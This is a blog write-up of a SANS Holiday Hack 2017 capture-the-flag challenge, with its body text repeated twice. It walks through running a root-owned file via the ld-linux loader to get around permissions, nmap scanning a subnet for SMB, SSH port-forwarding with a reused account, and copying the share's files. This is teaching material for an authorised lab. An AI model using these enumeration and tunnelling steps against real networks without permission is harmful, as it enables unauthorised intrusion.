Fun with Flags - Sans Holiday Hack 2017 Challenge 3
Read Time: 10 Minutes
Keeping to the "Fun with Flags", this post will demonstrate how I solved the third challenge for the SANS Holiday Hack 2017. Building on the content in my last couple posts, see Challenge 1 and Challenge 2, I demonstrate how the Console Challenge was solved and any hacking required to capture the actual flag.
For Challenge 3 the following question is posed:
"The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?"
The hint "...please see Holly Evergreen in the Cryokinetic Magic Level" is provided. So heading over to the challenge we try to locate our first terminal which can be seen in Figure 2: Finding the Third Terminal.
After a left click you are greeted with a console screen that has the following banner message containing the challenge. (See Figure 3: Challenge 3 Terminal)
Like in Challenge 1 & 2 we find ourselves engaged in reading comprehension to sort what needs to be done. For your reading pleasure I have underlined the key words in Figure 4: Challenge 3 Terminal What Next?.
We have a filename being referenced in Figure 4 called CandyCaneStriper which needs to be ran as a executable. So two important points:
1. Where is this file?
2. Why wont it start?
Both of these questions were solved using a command called "ls" with the switches "-liah" giving us a complete command of "ls -liah" as seen in Figure 5: We find our target. Please note that this command lists the contents of my current working directory(see the pwd command result) and provides (by switch) the following information:
1. -l = "use a long listing format"
2. -i = "print the index number of each file" These numbers are typically used by computers to identify data on the disk.
3. -a = show all and " do not ignore entries starting with ."
4. -h = make the results human readable "with -l and -s, print sizes like 1K 234M 2G etc"
In Figure 5 we are greeted with our executable CandyCaneStriper. However, notice we are logged in as elf and the owner of the file is root. Other challenges presented to us include that the file has a read only permission for everyone else but the owner (root) and members of the group called root. (See more about understanding linux terminals here and linux file permissions here.)
We can see that given our current permissions and the permission on the executable CandyCaneStriper we need to modify the attributes of the file to allow us to execute it. Typically you can use "chmod +x" to add the missing permission to the file. However, we are not the owner of the file and therefore cannot change it. So we leverage a dynamic loader called ld-linux to achieve execution. In Figure 7: We did it we leverage a 64-bit version of the loader as described here.
By solving this challenge we get clues to take on the actual hacking portion of the event which includes "...identify and enumerate the SMB file-sharing server..." and determine "...the file server share name". In Figure 8: First Set of Hints we start to unfold how to get into the SMB Server:
Great information is revealed within the hints on how to use SSH in linux, SSH via Putty on Windows, the exact syntax for SSH in linux, and the exact syntax for smbclient utility in linux.
Contrary to some of the recommendation I found it easier to use a derivative of the original hints. The sequence I followed and an explanation of each step can be found below:
1. nmap scanning for smb shares with the following syntax on the letter server:
nmap -Pn -PS445 10.132.0.0/24
For reference: the manual for nmap can be found here, standard tcp ports can be found here, what is ping "icmp echo request/reply" can be found here, and how cidr notation works can be found here. Also, the targeted cidr notation was derived from the scope given in the introductory page of the SANs Holiday Hack 2017:
2. After finding that a host at .7 was running the SMB service I setup port-forwarding so that my smb client could connect:
ssh -L 445:10.142.0.7:445 alabaster_snowball@X.185.84.51
3. Using the tunnel with my SMB Client I connected to the server:
nautilus smb://127.0.0.1
4. Then l simply made a copy of all the files to my local system and made a hash of the Great Book page:
sha1sum ./GreatBookPage3.pdf
At this time the system with the live screen shots of the steps above executing is under maintenance. This blog post will be updated with fresh images showing the result of the sequence in steps 1 through 4 being performed after the maintenance is complete.
Please leave comments below and I look forward to sharing more experiences that I have with my readership.
References
Keeping to the "Fun with Flags", this post will demonstrate how I solved the third challenge for the SANS Holiday Hack 2017. Building on the content in my last couple posts, see Challenge 1 and Challenge 2, I demonstrate how the Console Challenge was solved and any hacking required to capture the actual flag.
Figure 1: Fun with Flags Staarfaenger
For Challenge 3 the following question is posed:
"The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?"
The hint "...please see Holly Evergreen in the Cryokinetic Magic Level" is provided. So heading over to the challenge we try to locate our first terminal which can be seen in Figure 2: Finding the Third Terminal.
Figure 2: Finding the Third Terminal
After a left click you are greeted with a console screen that has the following banner message containing the challenge. (See Figure 3: Challenge 3 Terminal)
Figure 3: Challenge 3 Terminal
Like in Challenge 1 & 2 we find ourselves engaged in reading comprehension to sort what needs to be done. For your reading pleasure I have underlined the key words in Figure 4: Challenge 3 Terminal What Next?.
Figure 4: Challenge 3 Terminal What Next?
We have a filename being referenced in Figure 4 called CandyCaneStriper which needs to be ran as a executable. So two important points:
1. Where is this file?
2. Why wont it start?
Both of these questions were solved using a command called "ls" with the switches "-liah" giving us a complete command of "ls -liah" as seen in Figure 5: We find our target. Please note that this command lists the contents of my current working directory(see the pwd command result) and provides (by switch) the following information:
1. -l = "use a long listing format"
2. -i = "print the index number of each file" These numbers are typically used by computers to identify data on the disk.
3. -a = show all and " do not ignore entries starting with ."
4. -h = make the results human readable "with -l and -s, print sizes like 1K 234M 2G etc"
Figure 5: We find our target
In Figure 5 we are greeted with our executable CandyCaneStriper. However, notice we are logged in as elf and the owner of the file is root. Other challenges presented to us include that the file has a read only permission for everyone else but the owner (root) and members of the group called root. (See more about understanding linux terminals here and linux file permissions here.)
Figure 6: A little Closer
We can see that given our current permissions and the permission on the executable CandyCaneStriper we need to modify the attributes of the file to allow us to execute it. Typically you can use "chmod +x" to add the missing permission to the file. However, we are not the owner of the file and therefore cannot change it. So we leverage a dynamic loader called ld-linux to achieve execution. In Figure 7: We did it we leverage a 64-bit version of the loader as described here.
Figure 7: We did it
By solving this challenge we get clues to take on the actual hacking portion of the event which includes "...identify and enumerate the SMB file-sharing server..." and determine "...the file server share name". In Figure 8: First Set of Hints we start to unfold how to get into the SMB Server:
Figure 8: First Set of Hints
We can gather from this set of hints the following: we will need to find the SMB server using a network discovery tool called Nmap, keep in mind that Albaster likes to stick to the same passwords, and that SSH Tunneling will provide the medium to access the internal network behind our Letter's Server. In Figure 9: Second Set of Hints we learn of the technical detail in using SSH and the different options for connecting to a smb share depending on the operating system being used by the Holiday Hack participants:
Figure 9: Second Set of Hints
Great information is revealed within the hints on how to use SSH in linux, SSH via Putty on Windows, the exact syntax for SSH in linux, and the exact syntax for smbclient utility in linux.
Contrary to some of the recommendation I found it easier to use a derivative of the original hints. The sequence I followed and an explanation of each step can be found below:
1. nmap scanning for smb shares with the following syntax on the letter server:
nmap -Pn -PS445 10.132.0.0/24
- nmap = name of executable that needs to run
- -Pn = Don't Ping
- -PS445 = Look for port 445
- 10.132.0.0/24 = perform this checking on all hosts between the addresses of 10.132.0.1 through 10.132.0.254
For reference: the manual for nmap can be found here, standard tcp ports can be found here, what is ping "icmp echo request/reply" can be found here, and how cidr notation works can be found here. Also, the targeted cidr notation was derived from the scope given in the introductory page of the SANs Holiday Hack 2017:
Figure 10: Scope defined by CIDR notation
2. After finding that a host at .7 was running the SMB service I setup port-forwarding so that my smb client could connect:
ssh -L 445:10.142.0.7:445 alabaster_snowball@X.185.84.51
- ssh = name of executable that needs to run
- -L 445:10.142.0.7:445 = listen on the local port 445 and forward any connections to 10.142.0.7 port 445
- alabaster_snowball@35.185.84.51 = use the user name "alabaster_snowball" and connect to X.185.84.51 (letters server public ip address at the time of the competition)
3. Using the tunnel with my SMB Client I connected to the server:
nautilus smb://127.0.0.1
- nautilus = name of executable that needs to run (gnome file manager)
- smb://127.0.0.1 = use the protocol SMB (aka connect to port 445) on ip address 127.0.0.1 (a reference to my local port). Given the command from step 2 this causes a connection to 10.142.0.7 on port 445.
4. Then l simply made a copy of all the files to my local system and made a hash of the Great Book page:
sha1sum ./GreatBookPage3.pdf
- sha1sum = name of executable that needs to run to generate the sha1 hash used to check in flags
- ./GreatBookPage3.pdf = tells the executable to hash the file in my current directory of the name "GreatBookPage3.pdf"
Please leave comments below and I look forward to sharing more experiences that I have with my readership.
References
- The Big Bang Theory. Fansite. "Fun with Flags". https://the-big-bang-theory.com/fun_with_flags/
- SANS. Holiday Hack Challenge. "The 2017 SANS Holiday Hack Challenge". https://holidayhackchallenge.com/2017/
- Peter Staarfaenger. Digital First Response Blog "Fun with Flags - Sans Holiday Hack 2017 Challenge 1". https://digitalfirstresponse.blogspot.com/2018/01/fun-with-flags-sans-holiday-hack-2017.html
- man7.org. Linux man pages. "ls". http://man7.org/linux/man-pages/man1/ls.1.html
- man7.org. Linux man pages. "pwd". http://man7.org/linux/man-pages/man1/pwd.1.html
- DigitalOcean.com. Tutorials. "An Introduction to the Linux Terminal". https://www.digitalocean.com/community/tutorials/an-introduction-to-the-linux-terminal
- wiki.archlinux.org. Archlinux Wiki. "File Permissions and Attributes". https://wiki.archlinux.org/index.php/File_permissions_and_attributes
- Nmap. Nmap Website. "Nmap: The Network Map - The Free Security Scanner". https://nmap.org/
- Ubuntu. Ubuntu Wiki. "SSH/OpenSSH/PortForwarding". https://help.ubuntu.com/community/SSH/OpenSSH/PortForwarding
- Devolutions. Devolutions Blog. "How to configure an SSH tunnel on Putty". https://blog.devolutions.net/2017/4/how-to-configure-an-ssh-tunnel-on-putty
- die.net. Linux man pages. "nmap". https://linux.die.net/man/1/nmap
- Internet Assigned Numbers Authority (IANA). Service Names and Port Number Assignments Table. https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?&page=8
- die.net. Linux man pages. "ping".https://linux.die.net/man/8/ping
- Internet Engineering Task Force (IETF). Linux man pages. "ps".https://tools.ietf.org/html/rfc792
- Wikipedia. Wiki. "Classless Inter Domain Routing"(CIDR). https://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing
- SANS. Holiday Hack Challenge Scope. "The 2017 SANS Holiday Hack Challenge".https://holidayhackchallenge.com/2017/
Comments
Post a Comment